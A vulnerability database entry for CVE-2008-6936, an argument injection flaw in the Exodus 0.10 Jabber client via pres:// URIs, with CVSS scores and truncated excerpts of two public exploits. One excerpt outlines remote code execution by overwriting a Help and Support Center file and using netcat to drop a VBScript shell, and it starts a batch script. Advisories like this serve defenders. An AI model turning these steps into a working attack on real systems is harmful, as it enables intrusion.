9.3
CVSSv2

CVE-2008-6936

Published: 11/08/2009 Updated: 29/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 940
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Argument injection vulnerability in Exodus 0.10 allows remote malicious users to inject arbitrary command line arguments, overwrite arbitrary files, and cause a denial of service via encoded spaces in a pres:// URI, a different vector than CVE-2008-6935.

Vulnerable Product Search on Vulmon Subscribe to Product

jabber exodus 0.10

Exploits

-------------------------------------------------------------------------------- Exodus v010 uri handler arbitrary parameter injection by Nine:Situations:Group::strawdog tested against IE8b/xpsp3 may not work against non-English systems because of an installation bug -------------------------------------------------------------------------------- ...
<!-- Exodus v010 remote code execution exploit by Nine:Situations:Group::strawdog This uses the "-l" argument to overwrite a file inside Microsoft Help and Support Center folders (oh rgod) Firstly run netcat in listen mode to drop the vbscript shell run this script: @echo off rem dropshcmd echo ^<SCRIPT LANGUAGE="VBScript"^> > t ...